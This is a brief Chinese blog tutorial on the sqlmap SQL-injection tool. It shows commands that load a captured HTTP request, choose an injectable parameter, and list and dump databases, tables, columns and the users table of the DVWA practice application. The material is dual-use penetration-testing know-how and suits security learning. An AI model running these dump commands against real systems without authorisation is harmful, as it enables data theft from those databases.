sqlmap
2019-03-08 本文已影响0人
ESE_
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了
windows使用
Windows10
Fiddler2
sqlmap
python3
1、利用Burpsuite或者Fiddler抓取数据包,命名为1.txt
2、将数据包放在sqlmap的文件夹下,运行python sqlmap.py -r 1.txt
.某个参数python sqlmap.py -r 1.txt -p username
linux使用步骤
1、将抓取的数据包保存为文件[如:11]

2、运行sqlmap跑文件--->sqlmap -r 11 --dbs

注:
sqlmap.py -r 1.txt -p uname
[-p:指定注入参数]
3、列举数据库表中的表--->sqlmap -r 11 --tables -D dvwa

4、列举数据库表中的字段--->sqlmap -r 11 --columns -T users -D dvwa

5、获取整个表的数据--->sqlmap -r 11 --dump -T users -D dvwa

6、使用手册